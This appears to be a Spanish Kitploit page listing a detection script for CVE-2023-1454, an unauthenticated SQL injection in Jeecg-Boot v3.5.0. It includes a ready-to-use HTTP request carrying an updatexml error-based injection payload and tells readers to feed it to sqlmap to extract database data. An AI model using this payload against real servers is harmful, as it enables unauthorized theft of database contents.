Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-1454 — Script de detección de la vulnerabilidad CVE-2023-1454 | Kitploit
Herramientas/GitHubGitHub/bugfor-pings/cve-2023-1454
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

Script de detección de la vulnerabilidad CVE-2023-1454

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-1454

Script de detección de la vulnerabilidad CVE-2023-1454

Este artículo es solo para fines de referencia. No utilice los materiales técnicos y las herramientas del artículo para llevar a cabo intrusiones en ningún sistema informático sin autorización. El usuario es el único responsable de las consecuencias y pérdidas directas o indirectas derivadas de la información proporcionada en este artículo.

Introducción Jeecg-Boot es una plataforma de desarrollo de bajo código basada en un generador de código. Ofrece una serie de funciones como generadores de código, motores de plantillas, gestión de permisos, diccionarios de datos, importación y exportación de datos, entre otras, que ayudan a los desarrolladores a crear rápidamente aplicaciones de nivel empresarial.

Resumen de la vulnerabilidad La plataforma Java de bajo código Jeecg-Boot (v3.5.0) para aplicaciones web empresariales utiliza jimureport-spring-boot-starter-1.5.6.jar. Jeecg-Boot presenta deficiencias en el filtrado de caracteres especiales. Con el frontend basado en Vue3 en la versión v3.5.0, Jeecg presenta una inyección SQL no autenticada. El punto de la vulnerabilidad reside en que, cuando se invoca la ruta /querySql, la SQL llamada no procesa el parámetro id, lo que permite llevar a cabo directamente una inyección basada en errores. Un atacante remoto no autenticado puede construir cadenas especialmente manipuladas y, en última instancia, obtener información sensible de la base de datos del objetivo.

Versiones afectadas Versión afectada: Jeecg-Boot = v3.5.0

Guarde el paquete de datos como txt y utilice sqlmap para obtener los datos

root@kitploit:~
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

Descargar herramienta